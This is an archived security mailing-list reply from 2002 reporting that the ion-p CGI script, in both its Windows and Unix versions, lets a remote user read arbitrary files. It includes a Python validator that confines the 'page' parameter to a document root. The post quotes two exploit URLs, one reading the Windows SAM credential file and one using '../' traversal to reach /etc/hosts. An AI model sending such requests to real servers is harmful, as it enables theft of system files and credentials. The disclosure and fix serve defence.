Re: ion-p.exe allows Remote File Retrieving

From: Stuart Moore (smoore.bugtraqat_private)
Date: Fri Nov 01 2002 - 13:42:55 PST


    Hi,
    
    > ion-p.exe allows Remote File Retrieving
    >
    > www.Server.com/cgi-bin/ion-p.exe?page=c:\winnt\repair\sam
    >
    
    The 'ion-p' *NIX version is also vulnerable.  Directory traversal chars can be used, too:
    
    /cgi-bin/ion-p?page=../../../../../etc/hosts 
    
    
    Bye,
    
    Stuart
    
    
    -- 
    Stuart Moore
    SecurityTracker.com
    SecurityGlobal.net LLC
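
Both requests in this thread work because the `page` value reaches the file open call unchecked. As an added example (not part of the original post and not ion-p's own code), the following shows one way a handler can confine `page` to a document root; `DOC_ROOT` and `resolve_page` are hypothetical names, and the root path is an assumption.

```python
import posixpath
import re
from urllib.parse import unquote

# Hypothetical document root; the post does not say where ion-p reads pages from.
DOC_ROOT = "/srv/ion/pages"

# Windows drive-letter prefix such as "c:".
_DRIVE = re.compile(r"^[A-Za-z]:")


def resolve_page(page, root=DOC_ROOT):
    """Return the normalised path for a `page` value, or None if it leaves root."""
    value = unquote(page)
    if "\x00" in value:
        return None
    # Treat backslashes as separators so Windows-style input is judged the same way.
    value = value.replace("\\", "/")
    # Absolute paths and drive-letter paths are never valid page names.
    if value.startswith("/") or _DRIVE.match(value):
        return None
    # Collapse "." and ".." segments, then require the result to stay under root.
    # This check is lexical; on a real filesystem also resolve symlinks with
    # os.path.realpath() before comparing.
    candidate = posixpath.normpath(posixpath.join(root, value))
    if not candidate.startswith(root.rstrip("/") + "/"):
        return None
    return candidate


if __name__ == "__main__":
    # Constructed inputs, including the two values quoted in the thread.
    for sample in ["index.html", "docs/../index.html",
                   "../../../../../etc/hosts", "c:\\winnt\\repair\\sam"]:
        print(repr(sample), "->", resolve_page(sample))
```

A handler would return an error response whenever `resolve_page` yields `None` and open only the returned path otherwise.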
    



    This archive was generated by hypermail 2b30 : Fri Nov 01 2002 - 14:01:45 PST